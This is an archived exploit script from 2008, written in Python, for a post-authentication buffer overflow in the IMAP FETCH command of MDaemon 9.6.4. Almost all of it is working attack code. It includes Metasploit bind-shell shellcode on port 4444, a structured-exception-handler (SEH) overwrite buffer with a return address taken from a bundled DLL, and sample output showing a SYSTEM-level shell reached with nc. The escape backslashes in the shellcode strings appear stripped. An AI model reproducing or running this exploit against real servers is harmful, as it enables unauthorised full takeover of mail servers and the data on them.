mdaemon-overflow.txt
Posted on 14 March 2008
#!/usr/bin/python ############################################################################### # # MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day # Bug discovered and coded by Matteo Memelli aka ryujin # http://www.gray-world.net http://www.be4mind.com # # Affected Versions : MDaemon IMAP server v9.6.4 # Tested on OS : Windows 2000 SP4 English # Windows XP Sp2 English # Windows 2003 Standard Edition Italian # Discovery Date : 03/13/2008 # #----------------------------------------------------------------------------- # # muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL # # Thx to Silvia for feeding my obsessions # Thx to didNot at #offsec # (yes he doesn't look like Silvia but he's a nice guy LOL) # and to www.offensive-security.com # #----------------------------------------------------------------------------- ############################################################################## # [+] Connecting to imap server... # * OK test.local IMAP4rev1 MDaemon 9.6.4 ready # # [+] Logging in... # 0001 OK LOGIN completed # # [+] Selecting Inbox Folder... # * FLAGS (Seen Answered Flagged Deleted Draft Recent) # * 16 EXISTS # * 16 RECENT # * OK [UNSEEN 1] first unseen # * OK [UIDVALIDITY 1205411202] UIDs valid # * OK [UIDNEXT 17] Predicted next UID # * OK [PERMANENTFLAGS (Seen Answered Flagged Deleted Draft)] . # 0002 OK [READ-WRITE] SELECT completed # # [+] We need at least one message in Inbox, appending one... # + Ready for append literal # # [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE? # * 17 EXISTS # * 17 RECENT # 0003 OK [APPENDUID 1205411202 17] APPEND completed # # [+] DINNER'S READY: Sending Evil Buffer... # [+] DONE! Check your shell on 192.168.1.195:4444 # # # matte@badrobot:~$ nc 192.168.1.195 4444 # (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused # matte@badrobot:~$ nc 192.168.1.195 4444 # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:MDaemonAPP>whoami # whoami # NT AUTHORITYSYSTEM # # C:MDaemonAPP> ############################################################################## from socket import * from optparse import OptionParser import sys, time print "[*********************************************************************]" print "[* *]" print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]" print "[* DISCOVERED AND CODED *]" print "[* by *]" print "[* MATTEO MEMELLI *]" print "[* (ryujin) *]" print "[* www.be4mind.com - www.gray-world.net *]" print "[* *]" print "[*********************************************************************]" usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD" parser = OptionParser(usage=usage) parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Target Host") parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Target Port") parser.add_option("-l", "--login-user", type="string", action="store", dest="USER", help="User login") parser.add_option("-p", "--login-password", type="string", action="store", dest="PASSWD", help="User password") (options, args) = parser.parse_args() HOST = options.HOST PORT = options.PORT USER = options.USER PASSWD = options.PASSWD if not (HOST and PORT and USER and PASSWD): parser.print_help() sys.exit() # windows/shell_bind_tcp - 317 bytes # http://www.metasploit.com # EXITFUNC=thread, LPORT=4444 shellcode = ( "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b" "x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01" "xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07" "xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f" "x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b" "x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c" "x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff" "xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0" "x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08" "x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53" "x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66" "x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51" "x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0" "x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93" "x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66" "x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38" "xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57" "x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9" "x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83" "xc4x64xffxd6x52xffxd0x68xefxcexe0x60x53xffxd6" "xffxd0" ) s = socket(AF_INET, SOCK_STREAM) print " [+] Connecting to imap server..." s.connect((HOST, PORT)) print s.recv(1024) print " [+] Logging in..." s.send("0001 LOGIN %s %s " % (USER, PASSWD)) print s.recv(1024) print " [+] Selecting Inbox Folder..." s.send("0002 SELECT Inbox ") print s.recv(1024) print " [+] We need at least one message in Inbox, appending one..." s.send('0003 APPEND Inbox {1} ') print s.recv(1024) print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?" s.send('SPAGHETTI AND PWNSAUCE ') print s.recv(1024) print " [+] DINNER'S READY: Sending Evil Buffer..." # Seh overwrite at 532 Bytes # pop edi; pop ebp; ret; From mdaemon/HashCash.dll EVIL = "A"*528 + "xEBx06x90x90" + "x8bx11xdcx64" + "x90"*8 + shellcode + 'C'*35 s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)]) ") s.close() print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)